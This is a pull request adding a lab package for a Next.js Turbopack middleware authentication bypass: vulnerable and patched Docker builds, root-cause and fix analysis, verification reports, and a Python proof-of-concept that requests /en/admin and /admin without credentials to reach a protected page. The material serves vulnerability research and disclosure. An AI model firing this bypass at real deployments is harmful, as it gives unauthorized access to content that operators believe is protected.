### PR TITLE
Add CVE-2026-64642 Next.js Turbopack Middleware/Proxy Authentication Bypass (Single-Loca…

### DIFF
--- a/CVE-2026-64642/Dockerfile.patched
+++ b/CVE-2026-64642/Dockerfile.patched
@@ -1,0 +1,14 @@
+# syntax=docker/dockerfile:1
+FROM node:22-bookworm-slim
+
+# Pinned patched build: next@16.2.11 (npm registry;
+# sha512-B339zaqbyK8cmxhoAvLrcwoabwCP1wz21zSzfqxqXAemTu2BXnH7tQnfcglKv1vnMUIDBc+Hth7XODQriTZiRQ==)
+ARG NEXT_VERSION=16.2.11
+WORKDIR /app
+
+COPY app/ /app/
+RUN npm install --no-audit --no-fund --save-exact "next@${NEXT_VERSION}" react react-dom
+RUN npx next build --turbopack
+
+EXPOSE 3000
+CMD ["npx", "next", "start", "-p", "3000", "-H", "0.0.0.0"]

--- a/CVE-2026-64642/Dockerfile.vulnerable
+++ b/CVE-2026-64642/Dockerfile.vulnerable
@@ -1,0 +1,14 @@
+# syntax=docker/dockerfile:1
+FROM node:22-bookworm-slim
+
+# Pinned vulnerable build: next@16.2.10 (npm registry;
+# sha512-2som5AVXb3kE6Yjine3/mNbBayYF58eguBWIVVUdr1y/L426xyVEgYxgBG+1QC34P2x5E+tcDup6XkuOAX3dCA==)
+ARG NEXT_VERSION=16.2.10
+WORKDIR /app
+
+COPY app/ /app/
+RUN npm install --no-audit --no-fund --save-exact "next@${NEXT_VERSION}" react react-dom
+RUN npx next build --turbopack
+
+EXPOSE 3000
+CMD ["npx", "next", "start", "-p", "3000", "-H", "0.0.0.0"]

--- a/CVE-2026-64642/README.md
+++ b/CVE-2026-64642/README.md
@@ -1,0 +1,139 @@
+# CVE-2026-64642 - Next.js Turbopack Middleware/Proxy Authentication Bypass (Single-Locale i18n)
+
+> **Exploit Intelligence Platform** | [exploit-intel.com](https://exploit-intel.com) | [@exploit_intel](https://x.com/exploit_intel)
+
+## Vulnerability Summary
+
+| Field | Value |
+|-------|---------|
+| **CVE** | CVE-2026-64642 |
+| **Vendor** | Vercel |
+| **Product** | Next.js (npm package `next`) |
+| **Affected** | 16.0.0 – 16.2.10 (App Router + Turbopack build + single `i18n.locales` entry) |
+| **Type** | Improper Authorization / Middleware Auth Bypass (CWE-285) |
+| **CVSS** | 8.3 (HIGH) — `CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N` |
+| **EPSS** | 0.95% (58th percentile) |
+| **Author** | Exploit Intelligence Platform |
+| **Date** | 2026-08-13 |
+
+## Vulnerability Details
+
+Next.js applications using the App Router, built with Turbopack, and configured
+with exactly one entry in `i18n.locales` emit an edge-middleware matcher regexp
+that is missing the locale capture group. The router matches middleware against
+the locale-normalized pathname (the default-locale prefix is applied before
+matching), so the malformed matcher never matches any request — and
+middleware-based authentication is silently skipped for every request.
+
+An unauthenticated attacker simply requests a protected route — either the
+crafted locale-prefixed form (`/en/admin`) or the plain form (`/admin`) — and
+receives the protected content. No credentials, tokens, or special headers are
+required.
+
+This package demonstrates the bypass against a minimal App Router app whose
+`middleware.js` gates `/admin` behind an auth cookie: on the vulnerable build
+the unauthenticated requests return HTTP 200 with the protected page; on the
+patched build they return a 307 redirect to `/login`.
+
+## Affected Versions
+
+| Component | Affected | Fixed |
+|---|---|---|
+| next (npm) | 16.0.0 – 16.2.10 | 16.2.11 |
+
+- **Vulnerable version used in this lab**: `next@16.2.10` (npm, sha512 `2som5AVXb3kE6Yjine3/mNbBayYF58eguBWIVVUdr1y/L426xyVEgYxgBG+1QC34P2x5E+tcDup6XkuOAX3dCA==`)
+- **Patched version used as control**: `next@16.2.11` (npm, sha512 `B339zaqbyK8cmxhoAvLrcwoabwCP1wz21zSzfqxqXAemTu2BXnH7tQnfcglKv1vnMUIDBc+Hth7XODQriTZiRQ==`)
+- **Fixed by**: commit `6bf4df14508ad6c0cd46af50c6051ee42f2d9151` (PR #96014)
+- **Preconditions**: App Router, Turbopack build (`next build --turbopack`, default in 16.x), `i18n.locales` with exactly one locale, auth enforced via edge-runtime `middleware`. The Node.js-runtime `proxy` convention derives its matchers from the unaffected JS path and does not reproduce the bug (verified).
+
+## Root Cause
+
+`crates/next-api/src/middleware.rs`, `MiddlewareEndpoint::output_assets`
+(Turbopack's middleware matcher builder), v16.2.10:
+
+```rust
+let has_i18n_locales = i18n
+    .as_ref()
+    .map(|i18n| i18n.locales.len() > 1)   // <-- count guard: false for a single locale
+    .unwrap_or(false);
+```
+
+When `has_i18n_locales` is false, the locale capture group
+`/:nextInternalLocale((?!_next/)[^/.]{1,})` is not prepended to the matcher
+source, producing (for `matcher: ['/admin']`):
+
+```
+vulnerable: ^(?:\/(_next\/data\/[^/]{1,}))?\/admin(\.json|\.rsc|\.segments\/.+\.segment\.rsc)?[\/#\?]?$
+fixed:      ^(?:\/(_next\/data\/[^/]{1,}))?(?:\/((?!_next\/)[^/.]{1,}))\/admin(\.json|\.rsc|\.segments\/.+\.segment\.rsc)?[\/#\?]?$
+```
+
+The webpack lineage
+(`packages/next/src/build/analysis/get-page-static-info.ts`,
+`getMiddlewareMatchers`) guards on `i18n?.locales` *presence*, not count, which
+is why only Turbopack builds are affected. Because the router applies the
+default-locale prefix to the pathname before consulting the matcher, the
+vulnerable regexp (no locale segment) matches nothing — the middleware never
+executes.
+
+## Fix Analysis
+
+Commit `6bf4df1` replaces the count guard with `let has_i18n_locales =
+i18n.is_some();`, restoring parity with the webpack implementation. The PR adds
+single-locale e2e cases asserting the locale group is present in the emitted
+manifest. Verified live: the 16.2.11 control build's
+`middleware-manifest.json` carries the locale group and gates both the plain
+and locale-prefixed request forms (307). Bypass candidates fired at the
+patched build (encoded/uppercase/doubled locale segments, `.rsc` transport
+forms, double-slash paths) were all gated or rejected — the fix held.
+
+## Attack Chain
+
+1. Identify a Next.js App Router deployment with middleware-gated routes,
+   Turbopack build, and single-locale i18n (the vulnerable matcher regexp is
+   baked into `.next/server/middleware/middleware-manifest.json` at build
+   time).
+2. Request the protected route with no credentials — `GET /en/admin` (crafted
+   locale prefix) or even plain `GET /admin`.
+3. The middleware matcher does not match the locale-normalized pathname, so
+   the auth middleware never runs; the router serves the protected page.
+
+## Lab Setup
+
+### Prerequisites
+
+- Docker with compose. Host ports 21284 (vulnerable) and 21285 (control).
+
+### Build and run
+
+```bash
+docker compose build && docker compose up -d && bash seed.sh   # vulnerable 16.2.10
+python3 poc/poc.py 127.0.0.1 21284                             # -> [SUCCESS]
+
+docker compose -p cve-2026-64642-control -f docker-compose.control.yml build
+docker compose -p cve-2026-64642-control -f docker-compose.control.yml up -d
+python3 poc/poc.py 127.0.0.1 21285                             # gate holds -> [FAILED]
+```
+
+`poc/poc.py` is Python 3 stdlib-only: it verifies the authed baseline (cookie
+`auth=lab-secret`), then requests `/en/admin` and `/admin` with no credentials
+and asserts HTTP 200 plus the protected-page canary `EIP_ADMIN_SECRET_7f3a9c21`.
+
+Expected output last line: `[SUCCESS]` on the vulnerable build; `[FAILED]` on
+the patched control (gate held).
+
+## Verification
+
+- Reproduction: 3/3 from cold state (fresh containers per cycle); deterministic
+  (the defect is baked into the build artifact, not a race).
+- Control: patched 16.2.11 gates both request forms (307) — `[FAILED]`.
+- Ground truth: both builds' `middleware-manifest.json` regexps captured in the
+  lab artifacts (missing vs present locale group).
+- Full evidence: `poc_verification_report.md`.
+
+## References
+
+- Advisory: https://github.com/vercel/next.js/security/advisories/GHSA-6gpp-xcg3-4w24
+- Patch commit: https://github.com/vercel/next.js/commit/6bf4df14508ad6c0cd46af50c6051ee42f2d9151
+- Pull request: https://github.com/vercel/next.js/pull/96014
+- Release: https://github.com/vercel/next.js/releases/tag/v16.2.11
+- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-64642

--- a/CVE-2026-64642/app/app/admin/page.jsx
+++ b/CVE-2026-64642/app/app/admin/page.jsx
@@ -1,0 +1,8 @@
+export default function Admin() {
+  return (
+    <div>
+      <h1>admin dashboard</h1>
+      <p id="secret">EIP_ADMIN_SECRET_7f3a9c21</p>
+    </div>
+  )
+}

--- a/CVE-2026-64642/app/app/layout.jsx
+++ b/CVE-2026-64642/app/app/layout.jsx
@@ -1,0 +1,7 @@
+export default function RootLayout({ children }) {
+  return (
+    <html lang="en">
+      <body>{children}</body>
+    </html>
+  )
+}

--- a/CVE-2026-64642/app/app/login/page.jsx
+++ b/CVE-2026-64642/app/app/login/page.jsx
@@ -1,0 +1,3 @@
+export default function Login() {
+  return <h1>LOGIN PAGE - authentication required</h1>
+}

--- a/CVE-2026-64642/app/app/page.jsx
+++ b/CVE-2026-64642/app/app/page.jsx
@@ -1,0 +1,3 @@
+export default function Home() {
+  return <h1>public home page</h1>
+}

--- a/CVE-2026-64642/app/middleware.js
+++ b/CVE-2026-64642/app/middleware.js
@@ -1,0 +1,18 @@
+import { NextResponse } from 'next/server'
+
+// Classic middleware (edge runtime): gate /admin behind an auth cookie.
+export function middleware(request) {
+  const authed = request.cookies.get('auth')?.value === 'lab-secret'
+  if (!authed) {
+    const res = NextResponse.redirect(new URL('/login', request.url), 307)
+    res.headers.set('x-from-middleware', 'redirect')
+    return res
+  }
+  const res = NextResponse.next()
+  res.headers.set('x-from-middleware', 'pass')
+  return res
+}
+
+export const config = {
+  matcher: ['/admin'],
+}

--- a/CVE-2026-64642/app/next.config.js
+++ b/CVE-2026-64642/app/next.config.js
@@ -1,0 +1,10 @@
+/** @type {import('next').NextConfig} */
+const nextConfig = {
+  i18n: {
+    locales: ['en'],
+    defaultLocale: 'en',
+    localeDetection: false,
+  },
+}
+
+module.exports = nextConfig

--- a/CVE-2026-64642/app/package.json
+++ b/CVE-2026-64642/app/package.json
@@ -1,0 +1,8 @@
+{
+  "name": "cve-2026-64642-lab-app",
+  "private": true,
+  "scripts": {
+    "build": "next build --turbopack",
+    "start": "next start"
+  }
+}

--- a/CVE-2026-64642/app/pages/404.jsx
+++ b/CVE-2026-64642/app/pages/404.jsx
@@ -1,0 +1,3 @@
+export default function NotFound() {
+  return <h1>404 - not found</h1>
+}

--- a/CVE-2026-64642/docker-compose.control.yml
+++ b/CVE-2026-64642/docker-compose.control.yml
@@ -1,0 +1,14 @@
+services:
+  web:
+    build:
+      context: .
+      dockerfile: Dockerfile.patched
+    image: cve-2026-64642-control:local
+    ports:
+      - "21285:3000"
+    healthcheck:
+      test: ["CMD-SHELL", "node -e \"fetch('http://localhost:3000/').then(r=>process.exit(r.ok?0:1)).catch(()=>process.exit(1))\""]
+      interval: 5s
+      timeout: 3s
+      retries: 12
+      start_period: 15s

--- a/CVE-2026-64642/docker-compose.yml
+++ b/CVE-2026-64642/docker-compose.yml
@@ -1,0 +1,14 @@
+services:
+  web:
+    build:
+      context: .
+      dockerfile: Dockerfile.vulnerable
+    image: cve-2026-64642-lab:local
+    ports:
+      - "21284:3000"
+    healthcheck:
+      test: ["CMD-SHELL", "node -e \"fetch('http://localhost:3000/').then(r=>process.exit(r.ok?0:1)).catch(()=>process.exit(1))\""]
+      interval: 5s
+      timeout: 3s
+      retries: 12
+      start_period: 15s

--- a/CVE-2026-64642/intel_brief.md
+++ b/CVE-2026-64642/intel_brief.md
@@ -1,0 +1,54 @@
+# Intel Brief — CVE-2026-64642
+
+## Overview
+
+| Field | Value |
+|---|---|
+| CVE ID | CVE-2026-64642 |
+| Title | Next.js: Middleware / Proxy bypass in App Router applications using Turbopack and single locale |
+| Affected software | Next.js (npm package `next`) |
+| Vendor | Vercel |
+| CVSS | 8.3 HIGH (CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N) |
+| EPSS | 0.95% (percentile 0.58) |
+| CWE | CWE-285 (Improper Authorization) |
+| Published | 2026-07-27 |
+| Exploited in the wild | No (CISA KEV: not listed; VulnCheck KEV: not listed; SSVC exploitation=none) |
+| Other IDs | GHSA-6gpp-xcg3-4w24 |
+
+## Affected versions
+
+| Branch | Vulnerable range | Patched version |
+|---|---|---|
+| 16.x | >= 16.0.0, < 16.2.11 | 16.2.11 |
+
+Preconditions: App Router application, built/served with Turbopack, and
+`i18n.locales` configured with exactly one locale.
+
+## Description
+
+Next.js is a React framework for building full-stack web applications. In
+versions 16.0.0 through 16.2.10, crafted requests targeting Next.js applications
+using App Router built with Turbopack and a single entry in
+`config.i18n.locales` can bypass middleware/proxy-based authentication. The
+issue is fixed in version 16.2.11.
+
+## Root cause summary
+
+Turbopack's middleware matcher builder (`crates/next-api/src/middleware.rs`,
+`MiddlewareEndpoint::output_assets`) prepended the locale capture group
+`/:nextInternalLocale((?!_next/)[^/.]{1,})` to middleware matcher sources only
+when `i18n.locales.len() > 1`. Single-locale i18n applications therefore emitted
+a middleware matcher regex with no locale segment. Locale-prefixed requests
+(e.g. `/en/<protected>`) fail to match the middleware matcher, so the
+middleware/proxy — including authentication checks — never runs, while the
+router still resolves and serves the protected route. The webpack build path
+(`get-page-static-info.ts`) prepends the locale group whenever `i18n.locales`
+exists, so only Turbopack builds are affected. The fix (commit 6bf4df1, PR
+#96014) makes the Turbopack condition `i18n.is_some()`, mirroring webpack.
+
+## References
+
+- https://github.com/vercel/next.js/security/advisories/GHSA-6gpp-xcg3-4w24
+- https://github.com/vercel/next.js/commit/6bf4df14508ad6c0cd46af50c6051ee42f2d9151
+- https://github.com/vercel/next.js/pull/96014
+- https://github.com/vercel/next.js/releases/tag/v16.2.11

--- a/CVE-2026-64642/lab_build_report.md
+++ b/CVE-2026-64642/lab_build_report.md
@@ -1,0 +1,46 @@
+# Lab Build Report — CVE-2026-64642
+
+## Environments
+
+| Environment | Compose project | Image | Next.js | Host port | URL |
+|---|---|---|---|---|---|
+| Vulnerable | cve-2026-64642-lab | cve-2026-64642-lab:local | 16.2.10 | 21284 | http://127.0.0.1:21284 |
+| Control (fixed) | cve-2026-64642-control | cve-2026-64642-control:local | 16.2.11 | 21285 | http://127.0.0.1:21285 |
+
+Ports derived from CVE id (`20000 + (202664642 % 4000) * 2 = 21284`, control `+1`). No deviation.
+
+## App shape (identical in both environments)
+
+- Minimal App Router app, single-locale i18n: `i18n: { locales: ['en'], defaultLocale: 'en', localeDetection: false }` in `next.config.js`.
+- Classic `middleware.js` (edge runtime) with `config.matcher = ['/admin']`; redirects unauthenticated requests to `/login` (307) unless cookie `auth=lab-secret`. (Next 16 warns the `middleware` file convention is deprecated in favor of `proxy`, but still builds/runs it.)
+- Routes: `/` (public), `/login` (public), `/admin` (protected, carries canary `EIP_ADMIN_SECRET_7f3a9c21`).
+- Built with `next build --turbopack`, served with `next start`.
+- A trivial `pages/404.jsx` is included: without it, `next build --turbopack` fails prerendering `/en/404` (`Cannot find module for page: /_document`) whenever i18n is configured on an app-only tree.
+
+## Build
+
+```
+cd lab
+docker compose build                                   # vulnerable
+docker compose -f docker-compose.control.yml -p cve-2026-64642-control build   # control
+```
+
+npm tarballs are fetched by the Docker build from the public registry;
+integrity (sha512, verified at research time against registry metadata):
+- next@16.2.10 sha512-2som5AVXb3kE6Yjine3/mNbBayYF58eguBWIVVUdr1y/L426xyVEgYxgBG+1QC34P2x5E+tcDup6XkuOAX3dCA==
+- next@16.2.11 sha512-B339zaqbyK8cmxhoAvLrcwoabwCP1wz21zSzfqxqXAemTu2BXnH7tQnfcglKv1vnMUIDBc+Hth7XODQriTZiRQ==
+
+## Key observation: matcher manifests
+
+- Vulnerable `.next/server/middleware/middleware-manifest.json` regexp:
+  `^(?:\/(_next\/data\/[^/]{1,}))?\/admin(\.json|\.rsc|\.segments\/.+\.segment\.rsc)?[\/#\?]?$` — **no locale group**.
+- Control regexp adds the locale group:
+  `^(?:\/(_next\/data\/[^/]{1,}))?(?:\/((?!_next\/)[^/.]{1,}))\/admin(\.json|\.rsc|\.segments\/.+\.segment\.rsc)?[\/#\?]?$`
+- With i18n configured, the router matches middleware against the
+  locale-normalized pathname (default-locale prefix applied), so the vulnerable
+  matcher never matches any request: middleware is skipped entirely.
+- Note: the Node.js-runtime `proxy.js` convention is NOT affected — its
+  `functions-config-manifest.json` matchers are derived in JS
+  (`getMiddlewareMatchers`, `get-page-static-info.ts`), which always prepends
+  the locale group. Verified empirically: proxy build gates `/en/admin` (307)
+  on 16.2.10.

--- a/CVE-2026-64642/poc/poc.py
+++ b/CVE-2026-64642/poc/poc.py
@@ -1,0 +1,112 @@
+#!/usr/bin/env python3
+# ──────────────────────────────────────────────────────────────────────
+# Exploit Title  : Vercel Next.js - Middleware/Proxy Authentication Bypass
+# CVE            : CVE-2026-64642
+# Vendor         : vercel
+# Product        : next.js
+# Affected       : 16.0.0 .. 16.2.10 (App Router + Turbopack + single i18n locale)
+# Type           : CWE-285 - Improper Authorization
+# CVSS           : 8.3 (HIGH)
+# Platform       : cross-platform
+# Author         : Exploit Intelligence Platform
+# Website        : https://exploit-intel.com
+# Twitter        : @exploit_intel
+# Date           : 2026-08-13
+#
+# For authorized security testing and educational purposes only.
+# ──────────────────────────────────────────────────────────────────────
+"""
+CVE-2026-64642 — Next.js Turbopack middleware auth bypass (single-locale i18n)
+
+Next.js App Router applications built with Turbopack that configure exactly one
+entry in `i18n.locales` emit an edge-middleware matcher regexp that is missing
+the locale capture group. Because the router matches middleware against the
+locale-normalized pathname, the matcher never matches, and middleware-based
+authentication is silently skipped for every request — a plain or
+locale-prefixed request to a protected route is served without any credentials.
+
+Usage: python3 poc/poc.py <host> <port>
+
+ATTACK CHAIN:
+  1. Build emits middleware-manifest matcher without the locale group
+     (Turbopack: has_i18n_locales required locales.len() > 1 before 16.2.11).
+  2. Request GET /<locale>/<protected> (e.g. /en/admin) with no credentials.
+  3. Middleware matcher does not match -> auth check never runs -> the
+     protected page content is returned to the unauthenticated client.
+"""
+
+import sys
+import urllib.request
+import urllib.error
+
+# Canary baked into the lab's protected /admin page. On a real target this is
+# whatever content sits behind the middleware gate; any protected-body marker
+# proves the bypass. The lab cookie that legitimizes access is auth=lab-secret.
+CANARY = "EIP_ADMIN_SECRET_7f3a9c21"
+PROTECTED_PATH = "/admin"
+LOCALE = "en"
+
+
+def fetch(base, path, cookie=None):
+    """One HTTP GET, redirects NOT followed (a 307 to /login means the gate held)."""
+    req = urllib.request.Request(base + path)
+    if cookie:
+        req.add_header("Cookie", cookie)
+    opener = urllib.request.build_opener(NoRedirect())
+    try:
+        resp = opener.open(req, timeout=15)
+        return resp.status, resp.read().decode("utf-8", "replace")
+    except urllib.error.HTTPError as e:
+        return e.code, e.read().decode("utf-8", "replace")
+
+
+class NoRedirect(urllib.request.HTTPRedirectHandler):
+    def redirect_request(self, req, fp, code, msg, headers, newurl):
+        return None
+
+
+def main():
+    if len(sys.argv) != 3:
+        sys.stderr.write("usage: python3 poc/poc.py <host> <port>\n")
+        sys.exit(2)
+    base = f"http://{sys.argv[1]}:{sys.argv[2]}"
+
+    # Step 0: sanity - the app is up and the public page answers.
+    status, _ = fetch(base, "/")
+    if status != 200:
+        print(f"[-] target not serving the app (GET / -> {status})")
+        print("[FAILED]")
+        return
+
+    # Step 1: gate sanity - WITH the legitimate auth cookie the protected page
+    # must be reachable; this proves the target really is the gated app and
+    # the canary path is correct (guards against testing a wrong/seedless lab).
+    status, body = fetch(base, PROTECTED_PATH, cookie="auth=lab-secret")
+    if status != 200 or CANARY not in body:
+        print(f"[-] authed baseline failed (GET {PROTECTED_PATH} with cookie -> {status}); "
+              "lab not seeded as expected")
+        print("[FAILED]")
+        return
+    print("[+] authed baseline OK: /admin with valid cookie returns the protected page")
+
+    # Step 2: the bypass. No credentials at all. The crafted locale-prefixed
+    # request is the advisory's vector; the plain path is probed too because
+    # the matcher never matches ANY request in the vulnerable build.
+    bypassed = []
+    for path in (f"/{LOCALE}{PROTECTED_PATH}", PROTECTED_PATH):
+        status, body = fetch(base, path)
+        if status == 200 and CANARY in body:
+            bypassed.append(path)
+            print(f"[+] BYPASS: GET {path} (no credentials) -> 200 + protected canary")
+        else:
+            print(f"[-] GET {path} (no credentials) -> {status}; gate held")
+
+    if bypassed:
+        print(f"[+] middleware auth bypass confirmed via: {', '.join(bypassed)}")
+        print("[SUCCESS]")
+    else:
+        print("[FAILED]")
+
+
+if __name__ == "__main__":
+    main()

--- a/CVE-2026-64642/poc_verification_report.md
+++ b/CVE-2026-64642/poc_verification_report.md
@@ -1,0 +1,49 @@
+# PoC Verification Report — CVE-2026-64642
+
+**Verdict: [SUCCESS]** — middleware/proxy-based authentication bypass on Next.js
+16.0.0–16.2.10 (App Router + Turbopack + single `i18n.locales` entry),
+unauthenticated, network-reachable.
+
+## Environment
+
+| | Vulnerable | Control (fixed) |
+|---|---|---|
+| next version | 16.2.10 | 16.2.11 |
+| Image | cve-2026-64642-lab:local | cve-2026-64642-control:local |
+| Base | node:22-bookworm-slim | node:22-bookworm-slim |
+| Build | `next build --turbopack` | `next build --turbopack` |
+| Port | 21284 | 21285 |
+
+## Reproduction ratio
+
+**3/3 from cold state** (`docker compose down -v` → `up -d --build` → seed →
+PoC), plus the authoritative run recorded in `artifacts/poc_run.txt` — 4/4
+successful executions total. The bypass is deterministic: the vulnerable
+artifact is baked into the build output (matcher regexp), not a race.
+
+## Control-run outcome
+
+The identical PoC against the patched build (16.2.11) ends in `[FAILED]`: the
+authed baseline succeeds, and both unauthenticated bypass requests are answered
+307 (redirect to /login) — the gate held. The impact is therefore attributable
+to the vulnerability fixed by commit 6bf4df1, not to build-independent
+behavior.
+
+## What the PoC proves
+
+`poc/poc.py` (Python 3, stdlib only) fetches the protected `/admin` route with
+no credentials — both the crafted locale-prefixed form `/en/admin` and the
+plain form — and asserts HTTP 200 plus the protected-page canary
+`EIP_ADMIN_SECRET_7f3a9c21`. On the vulnerable build both succeed; on the
+patched build both are redirected. Ground-truth matcher regexps from both
+builds' `middleware-manifest.json` are preserved in the lab artifacts and show
+the missing vs present locale group.
+
+## Bypass & Variant Analysis summary
+
+Bypass candidates fired at the still-running control build (double/encoded/
+uppercase/dotted locale segments, `.rsc` transport forms, double-slash paths)
+were all gated or rejected — the fix held. Variant hunting found the buggy
+`locales.len() > 1` guard unique to the patched line; the root-matcher shape is
+the same bug covered by the same fix. No bypass demonstrated, no new-CVE
+candidates.

--- a/CVE-2026-64642/seed.sh
+++ b/CVE-2026-64642/seed.sh
@@ -1,0 +1,12 @@
+#!/bin/bash
+# seed.sh — verifies the lab is up and the auth gate shape is as expected.
+set -euo pipefail
+PORT="${1:-21284}"
+for i in $(seq 1 30); do
+  curl -sf "http://127.0.0.1:${PORT}/" > /dev/null 2>&1 && echo "[+] Ready" && break
+  sleep 1
+  [ "$i" -eq 30 ] && echo "[-] TIMEOUT waiting for app" && exit 1
+done
+code=$(curl -s -o /dev/null -w '%{http_code}' "http://127.0.0.1:${PORT}/admin")
+echo "[+] GET /admin (no auth cookie) -> HTTP ${code} (vulnerable: 200 bypass; patched: 307)"
+echo "[+] URL: http://127.0.0.1:${PORT}  Auth cookie: auth=lab-secret"

--- a/CVE-2026-64642/vulnerability_analysis.md
+++ b/CVE-2026-64642/vulnerability_analysis.md
@@ -1,0 +1,86 @@
+# Vulnerability Analysis — CVE-2026-64642
+
+Seeded by `cve-research-analysis`; extended by branch and PoC stages.
+
+## Entrypoint to sink trace
+
+1. **Attacker input**: an HTTP request path carrying a locale segment, e.g.
+   `/en/admin` (single configured locale `en`).
+2. **Routing**: Next.js i18n routing accepts the locale prefix and resolves the
+   request to the protected page — the page is served whether or not middleware
+   ran.
+3. **Middleware dispatch gate**: the server consults the middleware manifest
+   (`.next/server/middleware/middleware-manifest.json`). Each matcher's `regexp`
+   decides whether middleware/proxy runs for the request path.
+4. **Sink (the bug)**: at build time, Turbopack generates that regexp in
+   `MiddlewareEndpoint::output_assets`
+   (`crates/next-api/src/middleware.rs`). It only prepended the locale capture
+   group `/:nextInternalLocale((?!_next/)[^/.]{1,})` when
+   `i18n.locales.len() > 1`:
+
+   ```rust
+   // v16.2.10 (vulnerable)
+   let has_i18n_locales = i18n
+       .as_ref()
+       .map(|i18n| i18n.locales.len() > 1)
+       .unwrap_or(false);
+   ```
+
+   With exactly one configured locale, the generated regexp is missing the
+   locale segment entirely:
+
+   ```
+   # vulnerable (Turbopack, single locale) — no locale group
+   ^(?:\/(_next\/data\/[^/]{1,}))?\/admin(\.json|\.rsc|\.segments\/.+\.segment\.rsc)?[\/#\?]?$
+
+   # fixed (16.2.11) or webpack — locale group present
+   ^(?:\/(_next\/data\/[^/]{1,}))?(?:\/((?!_next\/)[^/.]{1,}))\/admin(\.json|\.rsc|\.segments\/.+\.segment\.rsc)?[\/#\?]?$
+   ```
+
+5. **Impact**: `/en/admin` does not match the vulnerable regexp, so the
+   authentication middleware never executes; the router still serves `/admin`'s
+   content for the locale-prefixed path. Net effect: unauthenticated access to
+   routes the operator believed were protected by middleware/proxy auth.
+
+## Why only Turbopack + single locale
+
+- The webpack matcher implementation
+  (`packages/next/src/build/analysis/get-page-static-info.ts`,
+  `getMiddlewareMatchers`) guards on `i18n?.locales` existing, not on
+  `locales.length > 1` — webpack builds include the locale group even with one
+  locale.
+- Turbopack's Rust mirror added the erroneous `len() > 1` condition, so the
+  divergence only appears for Turbopack builds of single-locale i18n apps.
+
+## Fix assessment
+
+Commit `6bf4df14508ad6c0cd46af50c6051ee42f2d9151` (PR #96014, shipped in
+v16.2.11) replaces the count check with `let has_i18n_locales = i18n.is_some();`,
+matching the webpack behavior. The PR's e2e tests add single-locale cases and
+assert the locale group is present in the emitted manifest regexp. The fix is
+complete for the reported condition; residual questions (multi-segment locale
+shapes, basePath interaction) are covered by the PoC stage's Bypass & Variant
+Analysis.
+
+## Live-validation record
+
+Verified in Docker labs (next 16.2.10 vulnerable vs 16.2.11 control, identical
+App Router app, single-locale i18n, edge `middleware.js` gating `/admin` behind
+an auth cookie):
+
+- Vulnerable manifest matcher regexp **lacks** the locale group:
+  `^(?:\/(_next\/data\/[^/]{1,}))?\/admin(\.json|\.rsc|\.segments\/.+\.segment\.rsc)?[\/#\?]?$`
+- Control manifest matcher regexp **has** it:
+  `^(?:\/(_next\/data\/[^/]{1,}))?(?:\/((?!_next\/)[^/.]{1,}))\/admin(\.json|\.rsc|\.segments\/.+\.segment\.rsc)?[\/#\?]?$`
+- The router matches middleware against the locale-normalized pathname
+  (default-locale prefix applied before matching), so the vulnerable matcher
+  never matches any request and middleware is skipped entirely:
+  - vulnerable: `GET /en/admin` and `GET /admin` with no credentials → **200 +
+    protected canary**; `/EN/admin` also bypasses
+  - control: same requests → **307 to /login**; with the cookie → 200
+- Node.js-runtime `proxy.js` (Next 16 convention) is NOT affected: its
+  `functions-config-manifest.json` matchers are JS-derived
+  (`getMiddlewareMatchers`) and gate correctly on 16.2.10 — verified live.
+- Verdict: `[SUCCESS]`, 3/3 cold-state reproduction, control `[FAILED]`
+  (gate held). Bypass candidates fired at the control build (encoded/uppercase/
+  doubled locale segments, `.rsc` transports, double slashes) all held.

--- a/README.md
+++ b/README.md
@@ -138,6 +138,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;47194](CVE-2026-47194/) | **Frappe Framework**<br>Host-Header Poisoning to Magic-Link Account Takeover | **8.6** |
 | [CVE&#8209;2026&#8209;63637](CVE-2026-63637/) | **Dgraph**<br>Unauthenticated DQL Injection via GraphQL Regexp Filter | **8.6** |
 | [CVE&#8209;2026&#8209;70632](CVE-2026-70632/) | **FFmpeg**<br>CFHD Decoder Heap OOB Write via Crafted AVI | **8.5** |
+| [CVE&#8209;2026&#8209;64642](CVE-2026-64642/) | **Next.js**<br>Turbopack Middleware/Proxy Authentication Bypass (Single-Locale i18n) | **8.3** |
 | [CVE&#8209;2024&#8209;56143](CVE-2024-56143/) | **Strapi**<br>IDOR via lookup Parameter Injection | **8.2** |
 | [CVE&#8209;2026&#8209;42859](CVE-2026-42859/) | **neatvnc**<br>RSA-AES Pre-Auth Stack Buffer Overflow (RIP Hijack with No Canary) | **8.1** |
 | [CVE&#8209;2025&#8209;10622](CVE-2025-10622/) | **Foreman (Red Hat Satellite)**<br>OS Command Injection | **8.0** |
@@ -156,7 +157,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;35414](CVE-2026-35414/) | **OpenSSH**<br>Certificate Principal Matching Authentication Bypass | **N/A** |
 | [CVE&#8209;2025&#8209;59060](CVE-2025-59060/) | **Apache Ranger**<br>Apache Ranger TLS Hostname Verification Bypass | **N/A** |
 
-23 of the 120 indexed packages record a bypass or incomplete-fix finding.
+23 of the 121 indexed packages record a bypass or incomplete-fix finding.
 
 ## Typical package layout
 


### PR DESCRIPTION
Pipeline-staged publish package for CVE-2026-64642.

- Next.js — Turbopack Middleware/Proxy Authentication Bypass (Single-Locale i18n)
- CVSS 8.3; bypass: no
- Audit: exit contract + package sweep clean at publish time

Published via the pipeline UI publish gate.